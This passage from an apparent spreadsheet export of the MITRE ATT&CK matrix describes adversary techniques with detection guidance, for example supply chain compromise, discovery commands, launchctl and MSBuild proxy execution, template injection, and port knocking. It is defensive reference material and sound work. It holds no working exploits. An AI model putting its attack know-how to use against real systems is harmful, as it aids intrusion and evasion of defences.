Enable CryptoAPI v2 (CAPI) event logging (Citation: Entrust Enable CAPI2 Aug 2017) to monitor and analyze error events related to failed trust validation (Event ID 81, though this event can be subverted by hijacked trust provider components) as well as any other provided information events (ex: successful validations). Code Integrity event logging may also provide valuable indicators of malicious SIP or trust provider loads, since protected processes that attempt to load a maliciously-crafted trust validation component will likely fail (Event ID 3033). (Citation: SpectorOps Subverting Trust Sept 2017)
Utilize Sysmon detection rules and/or enable the Registry (Global Object Access Auditing) (Citation: Microsoft Registry Auditing Aug 2016) setting in the Advanced Security Audit policy to apply a global system access control list (SACL) and event auditing on modifications to Registry values (sub)keys related to SIPs and trust providers: (Citation: Microsoft Audit Registry July 2012)
* HKLM\SOFTWARE\Microsoft\Cryptography\OID
* HKLM\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID
* HKLM\SOFTWARE\Microsoft\Cryptography\Providers\Trust
* HKLM\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Providers\Trust
**Note:** As part of this technique, adversaries may attempt to manually edit these Registry keys (ex: Regedit) or utilize the legitimate registration process using [Regsvr32](https://attack.mitre.org/techniques/T1218/010). (Citation: SpectorOps Subverting Trust Sept 2017)
Analyze Autoruns data for oddities and anomalies, specifically malicious files attempting persistent execution by hiding within auto-starting locations. Autoruns will hide entries signed by Microsoft or Windows by default, so ensure “Hide Microsoft Entries” and “Hide Windows Entries” are both deselected. (Citation: SpectorOps Subverting Trust Sept 2017)</t>
  </si>
  <si>
    <t>File: File Modification, Module: Module Load, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>Matt Graeber, @mattifestation, SpecterOps</t>
  </si>
  <si>
    <t>Application control, Autoruns Analysis, Digital Certificate Validation, User Mode Signature Validation</t>
  </si>
  <si>
    <t>T1195</t>
  </si>
  <si>
    <t>Supply Chain Compromise</t>
  </si>
  <si>
    <t>Adversaries may manipulate products or product delivery mechanisms prior to receipt by a final consumer for the purpose of data or system compromise.
Supply chain compromise can take place at any stage of the supply chain including:
* Manipulation of development tools
* Manipulation of a development environment
* Manipulation of source code repositories (public or private)
* Manipulation of source code in open-source dependencies
* Manipulation of software update/distribution mechanisms
* Compromised/infected system images (multiple cases of removable media infected at the factory) (Citation: IBM Storwize) (Citation: Schneider Electric USB Malware) 
* Replacement of legitimate software with modified versions
* Sales of modified/counterfeit products to legitimate distributors
* Shipment interdiction
While supply chain compromise can impact any component of hardware or software, attackers looking to gain execution have often focused on malicious additions to legitimate software in software distribution or update channels. (Citation: Avast CCleaner3 2018) (Citation: Microsoft Dofoil 2018) (Citation: Command Five SK 2011) Targeting may be specific to a desired victim set (Citation: Symantec Elderwood Sept 2012) or malicious software may be distributed to a broad set of consumers but only move on to additional tactics on specific victims. (Citation: Avast CCleaner3 2018) (Citation: Command Five SK 2011) Popular open source projects that are used as dependencies in many applications may also be targeted as a means to add malicious code to users of the dependency. (Citation: Trendmicro NPM Compromise)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1195</t>
  </si>
  <si>
    <t>Use verification of distributed binaries through hash checking or other integrity checking mechanisms. Scan downloads for malicious signatures and attempt to test software and updates prior to deployment while taking note of potential suspicious activity. Perform physical inspection of hardware to look for potential tampering.</t>
  </si>
  <si>
    <t>Veeral Patel</t>
  </si>
  <si>
    <t>T1195.003</t>
  </si>
  <si>
    <t>Supply Chain Compromise: Compromise Hardware Supply Chain</t>
  </si>
  <si>
    <t>Adversaries may manipulate hardware components in products prior to receipt by a final consumer for the purpose of data or system compromise. By modifying hardware or firmware in the supply chain, adversaries can insert a backdoor into consumer networks that may be difficult to detect and give the adversary a high degree of control over the system. Hardware backdoors may be inserted into various devices, such as servers, workstations, network infrastructure, or peripherals.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1195/003</t>
  </si>
  <si>
    <t>Perform physical inspection of hardware to look for potential tampering. Perform integrity checking on pre-OS boot mechanisms that can be manipulated for malicious purposes.</t>
  </si>
  <si>
    <t>T1195.001</t>
  </si>
  <si>
    <t>Supply Chain Compromise: Compromise Software Dependencies and Development Tools</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may manipulate software dependencies and development tools prior to receipt by a final consumer for the purpose of data or system compromise. Applications often depend on external software to function properly. Popular open source projects that are used as dependencies in many applications may be targeted as a means to add malicious code to users of the dependency. (Citation: Trendmicro NPM Compromise)  
Targeting may be specific to a desired victim set or may be distributed to a broad set of consumers but only move on to additional tactics on specific victims. </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1195/001</t>
  </si>
  <si>
    <t xml:space="preserve">Use verification of distributed binaries through hash checking or other integrity checking mechanisms. Scan downloads for malicious signatures and attempt to test software and updates prior to deployment while taking note of potential suspicious activity. </t>
  </si>
  <si>
    <t>T1195.002</t>
  </si>
  <si>
    <t>Supply Chain Compromise: Compromise Software Supply Chain</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may manipulate application software prior to receipt by a final consumer for the purpose of data or system compromise. Supply chain compromise of software can take place in a number of ways, including manipulation of the application source code, manipulation of the update/distribution mechanism for that software, or replacing compiled releases with a modified version.
Targeting may be specific to a desired victim set or may be distributed to a broad set of consumers but only move on to additional tactics on specific victims.(Citation: Avast CCleaner3 2018) (Citation: Command Five SK 2011)  </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1195/002</t>
  </si>
  <si>
    <t>T1082</t>
  </si>
  <si>
    <t>System Information Discovery</t>
  </si>
  <si>
    <t>An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from [System Information Discovery](https://attack.mitre.org/techniques/T1082) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tools such as [Systeminfo](https://attack.mitre.org/software/S0096) can be used to gather detailed system information. A breakdown of system data can also be gathered through the macOS &lt;code&gt;systemsetup&lt;/code&gt; command, but it requires administrative privileges.
Infrastructure as a Service (IaaS) cloud providers such as AWS, GCP, and Azure allow access to instance and virtual machine information via APIs. Successful authenticated API calls can return data such as the operating system platform and status of a particular instance or the model view of a virtual machine.(Citation: Amazon Describe Instance)(Citation: Google Instances Resource)(Citation: Microsoft Virutal Machine API)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1082</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</si>
  <si>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and network information.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
In cloud-based systems, native logging can be used to identify access to certain APIs and dashboards that may contain system information. Depending on how the environment is used, that data alone may not be useful due to benign use during normal operations.</t>
  </si>
  <si>
    <t>Command: Command Execution, Instance: Instance Metadata, Process: OS API Execution, Process: Process Creation</t>
  </si>
  <si>
    <t>T1614</t>
  </si>
  <si>
    <t>System Location Discovery</t>
  </si>
  <si>
    <t xml:space="preserve">
Adversaries may gather information in an attempt to calculate the geographical location of a victim host. Adversaries may use the information from [System Location Discovery](https://attack.mitre.org/techniques/T1614) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Adversaries may attempt to infer the location of a system using various system checks, such as time zone, keyboard layout, and/or language settings.(Citation: FBI Ragnar Locker 2020)(Citation: Sophos Geolocation 2016)(Citation: Bleepingcomputer RAT malware 2020) Windows API functions such as &lt;code&gt;GetLocaleInfoW&lt;/code&gt; can also be used to determine the locale of the host.(Citation: FBI Ragnar Locker 2020) In cloud environments, an instance's availability zone may also be discovered by accessing the instance metadata service from the instance.(Citation: AWS Instance Identity Documents)(Citation: Microsoft Azure Instance Metadata 2021)
Adversaries may also attempt to infer the location of a victim host using IP addressing, such as via online geolocation IP-lookup services.(Citation: Securelist Trasparent Tribe 2020)(Citation: Sophos Geolocation 2016)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1614</t>
  </si>
  <si>
    <t>System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.
Monitor processes and command-line arguments for actions that could be taken to gather system location information. Remote access tools with built-in features may interact directly with the Windows API, such as calling &lt;code&gt; GetLocaleInfoW&lt;/code&gt; to gather information.(Citation: FBI Ragnar Locker 2020)
Monitor traffic flows to geo-location service provider sites, such as ip-api and ipinfo.</t>
  </si>
  <si>
    <t>Hiroki Nagahama, NEC Corporation; Katie Nickels, Red Canary; Manikantan Srinivasan, NEC Corporation India; Pooja Natarajan, NEC Corporation India; Wes Hurd</t>
  </si>
  <si>
    <t>T1016</t>
  </si>
  <si>
    <t>System Network Configuration Discovery</t>
  </si>
  <si>
    <t>Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include [Arp](https://attack.mitre.org/software/S0099), [ipconfig](https://attack.mitre.org/software/S0100)/[ifconfig](https://attack.mitre.org/software/S0101), [nbtstat](https://attack.mitre.org/software/S0102), and [route](https://attack.mitre.org/software/S0103).
Adversaries may use the information from [System Network Configuration Discovery](https://attack.mitre.org/techniques/T1016) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1016</t>
  </si>
  <si>
    <t>T1016.001</t>
  </si>
  <si>
    <t>System Network Configuration Discovery: Internet Connection Discovery</t>
  </si>
  <si>
    <t>Adversaries may check for Internet connectivity on compromised systems. This may be performed during automated discovery and can be accomplished in numerous ways such as using [Ping](https://attack.mitre.org/software/S0097), &lt;code&gt;tracert&lt;/code&gt;, and GET requests to websites.
Adversaries may use the results and responses from these requests to determine if the system is capable of communicating with their C2 servers before attempting to connect to them. The results may also be used to identify routes, redirectors, and proxy servers.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1016/001</t>
  </si>
  <si>
    <t>System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Command and Control, based on the information obtained.
Monitor processes and command-line arguments for actions that could be taken to check Internet connectivity.</t>
  </si>
  <si>
    <t>T1049</t>
  </si>
  <si>
    <t>System Network Connections Discovery</t>
  </si>
  <si>
    <t>Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network. 
An adversary who gains access to a system that is part of a cloud-based environment may map out Virtual Private Clouds or Virtual Networks in order to determine what systems and services are connected. The actions performed are likely the same types of discovery techniques depending on the operating system, but the resulting information may include details about the networked cloud environment relevant to the adversary's goals. Cloud providers may have different ways in which their virtual networks operate.(Citation: Amazon AWS VPC Guide)(Citation: Microsoft Azure Virtual Network Overview)(Citation: Google VPC Overview)
Utilities and commands that acquire this information include [netstat](https://attack.mitre.org/software/S0104), "net use," and "net session" with [Net](https://attack.mitre.org/software/S0039). In Mac and Linux, [netstat](https://attack.mitre.org/software/S0104) and &lt;code&gt;lsof&lt;/code&gt; can be used to list current connections. &lt;code&gt;who -a&lt;/code&gt; and &lt;code&gt;w&lt;/code&gt; can be used to show which users are currently logged in, similar to "net session".</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1049</t>
  </si>
  <si>
    <t>T1033</t>
  </si>
  <si>
    <t>System Owner/User Discovery</t>
  </si>
  <si>
    <t>Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using [OS Credential Dumping](https://attack.mitre.org/techniques/T1003).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Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Utilities and commands that acquire this information include &lt;code&gt;whoami&lt;/code&gt;. In Mac and Linux, the currently logged in user can be identified with &lt;code&gt;w&lt;/code&gt; and &lt;code&gt;who&lt;/code&gt;.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1033</t>
  </si>
  <si>
    <t>T1007</t>
  </si>
  <si>
    <t>System Service Discovery</t>
  </si>
  <si>
    <t>Adversaries may try to get information about registered services. Commands that may obtain information about services using operating system utilities are "sc," "tasklist /svc" using [Tasklist](https://attack.mitre.org/software/S0057), and "net start" using [Net](https://attack.mitre.org/software/S0039), but adversaries may also use other tools as well. Adversaries may use the information from [System Service Discovery](https://attack.mitre.org/techniques/T1007) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1007</t>
  </si>
  <si>
    <t>System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
Monitor processes and command-line arguments for actions that could be taken to gather system information related to services. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).</t>
  </si>
  <si>
    <t>T1569</t>
  </si>
  <si>
    <t>System Services</t>
  </si>
  <si>
    <t>Adversaries may abuse system services or daemons to execute commands or programs. Adversaries can execute malicious content by interacting with or creating services. Many services are set to run at boot, which can aid in achieving persistence ([Create or Modify System Process](https://attack.mitre.org/techniques/T1543)), but adversaries can also abuse services for one-time or temporary execution.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1569</t>
  </si>
  <si>
    <t>Monitor for command line invocations of tools capable of modifying services that doesn’t correspond to normal usage patterns and known software, patch cycles, etc. Also monitor for changes to executables and other files associated with services. Changes to Windows services may also be reflected in the Registry.</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Modification, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>T1569.001</t>
  </si>
  <si>
    <t>System Services: Launchctl</t>
  </si>
  <si>
    <t>Adversaries may abuse launchctl to execute commands or programs. Launchctl controls the macOS launchd process, which handles things like [Launch Agent](https://attack.mitre.org/techniques/T1543/001)s and [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)s, but can execute other commands or programs itself. Launchctl supports taking subcommands on the command-line, interactively, or even redirected from standard input.(Citation: Launchctl Man)
By loading or reloading [Launch Agent](https://attack.mitre.org/techniques/T1543/001)s or [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)s, adversaries can install persistence or execute changes they made.(Citation: Sofacy Komplex Trojan)
Running a command from launchctl is as simple as &lt;code&gt;launchctl submit -l &lt;labelName&gt; -- /Path/to/thing/to/execute "arg" "arg" "arg"&lt;/code&gt;. Adversaries can abuse this functionality to execute code or even bypass application control if launchctl is an allowed process.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1569/001</t>
  </si>
  <si>
    <t>KnockKnock can be used to detect persistent programs such as those installed via launchctl as launch agents or launch daemons. Additionally, every launch agent or launch daemon must have a corresponding plist file on disk which can be monitored. Monitor process execution from launchctl/launchd for unusual or unknown processes.</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Modification, Process: Process Creation, Service: Service Creation</t>
  </si>
  <si>
    <t>T1569.002</t>
  </si>
  <si>
    <t>System Services: Service Execution</t>
  </si>
  <si>
    <t>Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager (&lt;code&gt;services.exe&lt;/code&gt;) is an interface to manage and manipulate services.(Citation: Microsoft Service Control Manager) The service control manager is accessible to users via GUI components as well as system utilities such as &lt;code&gt;sc.exe&lt;/code&gt; and [Net](https://attack.mitre.org/software/S0039).
[PsExec](https://attack.mitre.org/software/S0029) can also be used to execute commands or payloads via a temporary Windows service created through the service control manager API.(Citation: Russinovich Sysinternals)
Adversaries may leverage these mechanisms to execute malicious content. This can be done by either executing a new or modified service. This technique is the execution used in conjunction with [Windows Service](https://attack.mitre.org/techniques/T1543/003) during service persistence or privilege escalation.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1569/002</t>
  </si>
  <si>
    <t>Changes to service Registry entries and command line invocation of tools capable of modifying services that do not correlate with known software, patch cycles, etc., may be suspicious. If a service is used only to execute a binary or script and not to persist, then it will likely be changed back to its original form shortly after the service is restarted so the service is not left broken, as is the case with the common administrator tool [PsExec](https://attack.mitre.org/software/S0029).</t>
  </si>
  <si>
    <t>Command: Command Execution, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>T1529</t>
  </si>
  <si>
    <t>System Shutdown/Reboot</t>
  </si>
  <si>
    <t>Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.(Citation: Microsoft Shutdown Oct 2017) Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.
Adversaries may attempt to shutdown/reboot a system after impacting it in other ways, such as [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) or [Inhibit System Recovery](https://attack.mitre.org/techniques/T1490), to hasten the intended effects on system availability.(Citation: Talos Nyetya June 2017)(Citation: Talos Olympic Destroyer 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1529</t>
  </si>
  <si>
    <t>04 October 2019</t>
  </si>
  <si>
    <t>Use process monitoring to monitor the execution and command line parameters of binaries involved in shutting down or rebooting systems. Windows event logs may also designate activity associated with a shutdown/reboot, ex. Event ID 1074 and 6006.</t>
  </si>
  <si>
    <t>Command: Command Execution, Process: Process Creation, Sensor Health: Host Status</t>
  </si>
  <si>
    <t>T1124</t>
  </si>
  <si>
    <t>System Time Discovery</t>
  </si>
  <si>
    <t>An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network. (Citation: MSDN System Time) (Citation: Technet Windows Time Service)
System time information may be gathered in a number of ways, such as with [Net](https://attack.mitre.org/software/S0039) on Windows by performing &lt;code&gt;net time \\hostname&lt;/code&gt; to gather the system time on a remote system. The victim's time zone may also be inferred from the current system time or gathered by using &lt;code&gt;w32tm /tz&lt;/code&gt;. (Citation: Technet Windows Time Service)
This information could be useful for performing other techniques, such as executing a file with a [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053) (Citation: RSA EU12 They're Inside), or to discover locality information based on time zone to assist in victim targeting (i.e. [System Location Discovery](https://attack.mitre.org/techniques/T1614)). Adversaries may also use knowledge of system time as part of a time bomb, or delaying execution until a specified date/time.(Citation: AnyRun TimeBomb)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1124</t>
  </si>
  <si>
    <t>Command-line interface monitoring may be useful to detect instances of net.exe or other command-line utilities being used to gather system time or time zone. Methods of detecting API use for gathering this information are likely less useful due to how often they may be used by legitimate software.</t>
  </si>
  <si>
    <t>FIRST.ORG's Cyber Threat Intelligence SIG</t>
  </si>
  <si>
    <t>T1080</t>
  </si>
  <si>
    <t>Taint Shared Content</t>
  </si>
  <si>
    <t xml:space="preserve">
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A directory share pivot is a variation on this technique that uses several other techniques to propagate malware when users access a shared network directory. It uses [Shortcut Modification](https://attack.mitre.org/techniques/T1547/009) of directory .LNK files that use [Masquerading](https://attack.mitre.org/techniques/T1036) to look like the real directories, which are hidden through [Hidden Files and Directories](https://attack.mitre.org/techniques/T1564/001). The malicious .LNK-based directories have an embedded command that executes the hidden malware file in the directory and then opens the real intended directory so that the user's expected action still occurs. When used with frequently used network directories, the technique may result in frequent reinfections and broad access to systems and potentially to new and higher privileged accounts. (Citation: Retwin Directory Share Pivot)
Adversaries may also compromise shared network directories through binary infections by appending or prepending its code to the healthy binary on the shared network directory. The malware may modify the original entry point (OEP) of the healthy binary to ensure that it is executed before the legitimate code. The infection could continue to spread via the newly infected file when it is executed by a remote system. These infections may target both binary and non-binary formats that end with extensions including, but not limited to, .EXE, .DLL, .SCR, .BAT, and/or .VBS.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1080</t>
  </si>
  <si>
    <t>Processes that write or overwrite many files to a network shared directory may be suspicious. Monitor processes that are executed from removable media for malicious or abnormal activity such as network connections due to Command and Control and possible network Discovery techniques.
Frequently scan shared network directories for malicious files, hidden files, .LNK files, and other file types that may not typical exist in directories used to share specific types of content.</t>
  </si>
  <si>
    <t>File: File Creation, File: File Modification, Network Share: Network Share Access, Process: Process Creation</t>
  </si>
  <si>
    <t>David Routin; Michal Dida, ESET</t>
  </si>
  <si>
    <t>T1221</t>
  </si>
  <si>
    <t>Template Injection</t>
  </si>
  <si>
    <t>Adversaries may create or modify references in Office document templates to conceal malicious code or force authentication attempts.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 (Citation: Microsoft Open XML July 2017)
Properties within parts may reference shared public resources accessed via online URLs. For example, template properties reference a file, serving as a pre-formatted document blueprint, that is fetched when the document is loaded.
Adversaries may abuse this technology to initially conceal malicious code to be executed via documents. Template references injected into a document may enable malicious payloads to be fetched and executed when the document is loaded. (Citation: SANS Brian Wiltse Template Injection) These documents can be delivered via other techniques such as [Phishing](https://attack.mitre.org/techniques/T1566) and/or [Taint Shared Content](https://attack.mitre.org/techniques/T1080) and may evade static detections since no typical indicators (VBA macro, script, etc.) are present until after the malicious payload is fetched. (Citation: Redxorblue Remote Template Injection) Examples have been seen in the wild where template injection was used to load malicious code containing an exploit. (Citation: MalwareBytes Template Injection OCT 2017)
This technique may also enable [Forced Authentication](https://attack.mitre.org/techniques/T1187) by injecting a SMB/HTTPS (or other credential prompting) URL and triggering an authentication attempt. (Citation: Anomali Template Injection MAR 2018) (Citation: Talos Template Injection July 2017) (Citation: ryhanson phishery SEPT 2016)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1221</t>
  </si>
  <si>
    <t>Analyze process behavior to determine if an Office application is performing actions, such as opening network connections, reading files, spawning abnormal child processes (ex: [PowerShell](https://attack.mitre.org/techniques/T1059/001)), or other suspicious actions that could relate to post-compromise behavior.</t>
  </si>
  <si>
    <t>Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Process: Process Creation</t>
  </si>
  <si>
    <t>Brian Wiltse @evalstrings; Patrick Campbell, @pjcampbe11</t>
  </si>
  <si>
    <t>Static File Analysis</t>
  </si>
  <si>
    <t>T1205</t>
  </si>
  <si>
    <t>Traffic Signaling</t>
  </si>
  <si>
    <t>Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://attack.mitre.org/techniques/T1205/001)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software.
Adversaries may also communicate with an already open port, but the service listening on that port will only respond to commands or trigger other malicious functionality if passed the appropriate magic value(s).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
On network devices, adversaries may use crafted packets to enable [Network Device Authentication](https://attack.mitre.org/techniques/T1556/004) for standard services offered by the device such as telnet.  Such signaling may also be used to open a closed service port such as telnet, or to trigger module modification of malware implants on the device, adding, removing, or changing malicious capabilities.(Citation: Cisco Synful Knock Evolution) (Citation: FireEye - Synful Knock) (Citation: Cisco Blog Legacy Device Attacks)  To enable this traffic signaling on embedded devices, adversaries must first achieve and leverage [Patch System Image](https://attack.mitre.org/techniques/T1601/001) due to the monolithic nature of the architecture.
Adversaries may also use the Wake-on-LAN feature to turn on powered off systems. Wake-on-LAN is a hardware feature that allows a powered down system to be powered on, or woken up, by sending a magic packet to it. Once the system is powered on, it may become a target for lateral movement.(Citation: Bleeping Computer - Ryuk WoL) (Citation: AMD Magic Packet)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1205</t>
  </si>
  <si>
    <t>Command And Control, Defense Evasion, Persistence</t>
  </si>
  <si>
    <t>Record network packets sent to and from the system, looking for extraneous packets that do not belong to established flows.
The Wake-on-LAN magic packet consists of 6 bytes of &lt;code&gt;FF&lt;/code&gt; followed by sixteen repetitions of the target system's IEEE address. Seeing this string anywhere in a packet's payload may be indicative of a Wake-on-LAN attempt.(Citation: GitLab WakeOnLAN)</t>
  </si>
  <si>
    <t>Josh Day, Gigamon</t>
  </si>
  <si>
    <t>Defensive network service scanning</t>
  </si>
  <si>
    <t>T1205.001</t>
  </si>
  <si>
    <t>Traffic Signaling: Port Knocking</t>
  </si>
  <si>
    <t>Adversaries may use port knocking to hide open ports used for persistence or command and control. To enable a port, an adversary sends a series of attempted connections to a predefined sequence of closed ports. After the sequence is completed, opening a port is often accomplished by the host based firewall, but could also be implemented by custom software.
This technique has been observed to both for the dynamic opening of a listening port as well as the initiating of a connection to a listening server on a different system.
The observation of the signal packets to trigger the communication can be conducted through different methods. One means, originally implemented by Cd00r (Citation: Hartrell cd00r 2002), is to use the libpcap libraries to sniff for the packets in question. Another method leverages raw sockets, which enables the malware to use ports that are already open for use by other programs.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1205/001</t>
  </si>
  <si>
    <t>Record network packets sent to and from the system, looking for extraneous packets that do not belong to established flows.</t>
  </si>
  <si>
    <t>T1537</t>
  </si>
  <si>
    <t>Transfer Data to Cloud Account</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may exfiltrate data by transferring the data, including backups of cloud environments, to another cloud account they control on the same service to avoid typical file transfers/downloads and network-based exfiltration detection.
A defender who is monitoring for large transfers to outside the cloud environment through normal file transfers or over command and control channels may not be watching for data transfers to another account within the same cloud provider. Such transfers may utilize existing cloud provider APIs and the internal address space of the cloud provider to blend into normal traffic or avoid data transfers over external network interfaces.
Incidents have been observed where adversaries have created backups of cloud instances and transferred them to separate accounts.(Citation: DOJ GRU Indictment Jul 2018) </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1537</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor account activity for attempts to share data, snapshots, or backups with untrusted or unusual accounts on the same cloud service provider. Monitor for anomalous file transfer activity between accounts and to untrusted VPCs. </t>
  </si>
  <si>
    <t>Cloud Storage: Cloud Storage Creation, Cloud Storage: Cloud Storage Modification, Snapshot: Snapshot Creation, Snapshot: Snapshot Modification</t>
  </si>
  <si>
    <t>T1127</t>
  </si>
  <si>
    <t>Trusted Developer Utilities Proxy Execution</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</si>
  <si>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engineering.(Citation: engima0x3 DNX Bypass)(Citation: engima0x3 RCSI Bypass)(Citation: Exploit Monday WinDbg)(Citation: LOLBAS Tracker) These utilities may often be signed with legitimate certificates that allow them to execute on a system and proxy execution of malicious code through a trusted process that effectively bypasses application control solutions.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1127</t>
  </si>
  <si>
    <t>Monitor for abnormal presence of these or other utilities that enable proxy execution that are typically used for development, debugging, and reverse engineering on a system that is not used for these purposes may be suspicious.
Use process monitoring to monitor the execution and arguments of from developer utilities that may be abused. Compare recent invocations of those binaries with prior history of known good arguments and executed binaries to determine anomalous and potentially adversarial activity. It is likely that these utilities will be used by software developers or for other software development related tasks, so if it exists and is used outside of that context, then the event may be suspicious. Command arguments used before and after invocation of the utilities may also be useful in determining the origin and purpose of the binary being executed.</t>
  </si>
  <si>
    <t>Casey Smith; Matthew Demaske, Adaptforward</t>
  </si>
  <si>
    <t>T1127.001</t>
  </si>
  <si>
    <t>Trusted Developer Utilities Proxy Execution: MSBuild</t>
  </si>
  <si>
    <t>Adversaries may use MSBuild to proxy execution of code through a trusted Windows utility. MSBuild.exe (Microsoft Build Engine) is a software build platform used by Visual Studio. It handles XML formatted project files that define requirements for loading and building various platforms and configurations.(Citation: MSDN MSBuild)
Adversaries can abuse MSBuild to proxy execution of malicious code. The inline task capability of MSBuild that was introduced in .NET version 4 allows for C# or Visual Basic code to be inserted into an XML project file.(Citation: MSDN MSBuild)(Citation: Microsoft MSBuild Inline Tasks 2017) MSBuild will compile and execute the inline task. MSBuild.exe is a signed Microsoft binary, so when it is used this way it can execute arbitrary code and bypass application control defenses that are configured to allow MSBuild.exe execution.(Citation: LOLBAS Msbuild)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1127/001</t>
  </si>
  <si>
    <t>Use process monitoring to monitor the execution and arguments of MSBuild.exe. Compare recent invocations of those binaries with prior history of known good arguments and executed binaries to determine anomalous and potentially adversarial activity. Command arguments used before and after invocation of the utilities may also be useful in determining the origin and purpose of the binary being executed.</t>
  </si>
  <si>
    <t>Carrie Roberts, @OrOneEqualsOne</t>
  </si>
  <si>
    <t>T1199</t>
  </si>
  <si>
    <t>Trusted Relationship</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</si>
  <si>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
Organizations often grant elevated access to second or third-party external providers in order to allow them to manage internal systems as well as cloud-based environments. Some examples of these relationships include IT services contractors, managed security providers, infrastructure contractors (e.g. HVAC, elevators, physical security). The third-party provider's access may be intended to be limited to the infrastructure being maintained, but may exist on the same network as the rest of the enterprise. As such, [Valid Accounts](https://attack.mitre.org/techniques/T1078) used by the other party for access to internal network systems may be compromised and used.(Citation: CISA IT Service Providers)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1199</t>
  </si>
  <si>
    <t>Establish monitoring for activity conducted by second and third party providers and other trusted entities that may be leveraged as a means to gain access to the network. Depending on the type of relationship, an adversary may have access to significant amounts of information about the target before conducting an operation, especially if the trusted relationship is based on IT services. Adversaries may be able to act quickly towards an objective, so proper monitoring for behavior related to Credential Access, Lateral Movement, and Collection will be important to detect the intrusion.</t>
  </si>
  <si>
    <t>IaaS, Linux, SaaS, Windows, macOS</t>
  </si>
  <si>
    <t>Application Log: Application Log Content, Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata</t>
  </si>
  <si>
    <t>T1111</t>
  </si>
  <si>
    <t>Two-Factor Authentication Interception</t>
  </si>
  <si>
